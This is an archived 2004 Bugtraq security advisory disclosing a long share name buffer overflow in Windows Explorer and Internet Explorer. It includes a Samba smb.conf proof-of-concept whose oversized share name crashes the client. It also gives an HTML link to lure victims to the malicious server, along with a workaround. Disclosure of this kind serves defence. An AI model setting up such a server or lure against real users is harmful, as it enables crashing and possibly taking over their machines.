[34662] in bugtraq

home help back first fref pref prev next nref lref last post

Microsoft's Explorer and Internet Explorer long share name buffer overflow.

daemon@ATHENA.MIT.EDU (Rodrigo Gutierrez)
Mon Apr 26 12:49:39 2004

From: "Rodrigo Gutierrez" <rodrigo@intellicomp.cl>
To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>,
        <submissions@packetstormsecurity.org>, <info@securiteam.com>
Date: Sun, 25 Apr 2004 17:38:24 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0003_01C42AEC.1C000BB0"
Message-Id: <20040425213223.7647A4077@etrn.gtdinternet.com>

------=_NextPart_000_0003_01C42AEC.1C000BB0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Sunday afternoon is a bit boring, and weather sucks down here in Santiago,
Chile so here we go...
The vuln is attached in TXT format, I would be gratefull if someone could
verify if it affects windows 2003 as well.

Rodrigo.-

------=_NextPart_000_0003_01C42AEC.1C000BB0
Content-Type: text/plain;
	name="explorer-vuln.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="explorer-vuln.txt"

Microsoft Explorer and Internet Explorer Long Share Name Buffer =
Overflow.



Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>

Affected: MS Internet Explorer, MS Explorer (explorer.exe)=20
          Windows XP(All), Windows 2000(All)

Not Tested: Windows 2003, Windows me, Windows 98, Windows 95

Vendor Status: i notified the vendor in the beginning of 2002, this
               vulnerability was supposed to be fixed in xp service
               pack 1 according to the vendors knowledge base article
               322857.

Vendor url: =
http://support.microsoft.com/default.aspx?scid=3Dkb;en-us;322857



Background.

MS Explorer (explorer.exe) and MS Internet Explorer(IEXPLORE.EXE) are=20
core pieces of Microsoft Windows Operating Systems.



Description

Windows fails to handle long share names when accessing a remote=20
file servers such as samba, allowing a malicious server to crash the=20
clients explorer and eventually get to execute arbitrary code in the=20
machine as the current user (usually with Administrator rights in =
windows
machines).



Analysis

In order to exploit this, an attacker must be able to get a user to =
connect=20
to a malicious server which contains a share name equal or longer than =
300
characters, windows wont allow you to create such a share, but of course =
samba=20
includes the feature ;).   After your samba box is up and running create =
a=20
share in you smb.conf :



#------------ CUT HERE -------------

[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment =3D Area 51
path =3D /tmp/testfolder
public =3D yes
writable =3D yes
printable =3D no
browseable =3D yes
write list =3D @trymywingchung

#------------ CUT HERE -------------


After your server is up, just get to your windows test box and get to =
the
start menu > run > \\your.malicious.server.ip., plufff, explorer will =
crash
:).

Social Engineering:

<a href=3D"\\my.malicious.server.ip">Enter My 0day sploit archive</a>
=20


Workaround.

From your network card settings disable the client for Microsoft =
networks=20
until a real fix for this vulnerability is available.

------=_NextPart_000_0003_01C42AEC.1C000BB0--


home help back first fref pref prev next nref lref last post